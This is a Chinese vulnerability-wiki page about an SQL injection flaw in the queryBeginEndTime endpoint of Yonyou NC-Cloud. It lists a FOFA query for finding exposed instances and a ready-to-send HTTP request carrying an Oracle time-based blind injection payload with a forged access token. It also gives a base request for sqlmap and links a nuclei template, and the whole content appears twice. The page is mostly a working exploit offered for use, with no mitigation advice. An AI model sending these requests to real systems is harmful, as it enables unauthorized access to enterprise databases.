fofamini-wiki

登录白背景

源码

用友NC-Cloud系统queryBeginEndTime存在SQL注入漏洞

一、漏洞简介

NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud系统queryBeginEndTime存在SQL注入漏洞。

二、影响版本

用友NC Cloud

三、资产测绘

fofaapp="用友-NC-Cloud"
登录页面

四、漏洞复现

GET /ncchr/period/queryBeginEndTime?staffid=1%3F'%20and%204431%3Ddbms_pipe.receive_message(chr(83)%7C%7Cchr(104)%7C%7Cchr(82)%7C%7Cchr(70)%2C3)-- HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept-Encoding: gzip, deflate

sqlmap

GET /ncchr/period/queryBeginEndTime?staffid=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept-Encoding: gzip, deflate

nuclei脚本
用友-nc-cloud-querybeginendtime-sql注入.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/gzdcx5ddh4xtglrn

# 用友NC-Cloud系统queryBeginEndTime存在SQL注入漏洞

# 一、漏洞简介
NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud系统queryBeginEndTime存在SQL注入漏洞。

# 二、影响版本

- 用友NC Cloud

# 三、资产测绘

- fofa`app="用友-NC-Cloud"`
- 登录页面

![image.png](./img/0oijwKGP0uBfgqx7/1693575676700-0c5fed77-e3d1-4473-97a7-bfb8e7ae0bc1-453163.png)

## 四、漏洞复现
```
GET /ncchr/period/queryBeginEndTime?staffid=1%3F'%20and%204431%3Ddbms_pipe.receive_message(chr(83)%7C%7Cchr(104)%7C%7Cchr(82)%7C%7Cchr(70)%2C3)-- HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept-Encoding: gzip, deflate
```
![image.png](./img/0oijwKGP0uBfgqx7/1702656075256-ceb66b3b-038f-4e26-afaf-9468adada4bf-472518.png)
sqlmap
```
GET /ncchr/period/queryBeginEndTime?staffid=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept-Encoding: gzip, deflate
```
![image.png](./img/0oijwKGP0uBfgqx7/1702656448525-9f5824b1-9608-4186-8201-dda890c355fd-285038.png)
nuclei脚本
[用友-nc-cloud-querybeginendtime-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219611118-e43c13d4-e89c-49f1-917c-731af8ac61be.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219611118-e43c13d4-e89c-49f1-917c-731af8ac61be.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-nc-cloud-querybeginendtime-sql%E6%B3%A8%E5%85%A5.yaml%22%2C%22size%22%3A1459%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ub0ae5d03-4f56-45c1-830b-0124336be8f%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22ucc0f6358%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzdcx5ddh4xtglrn>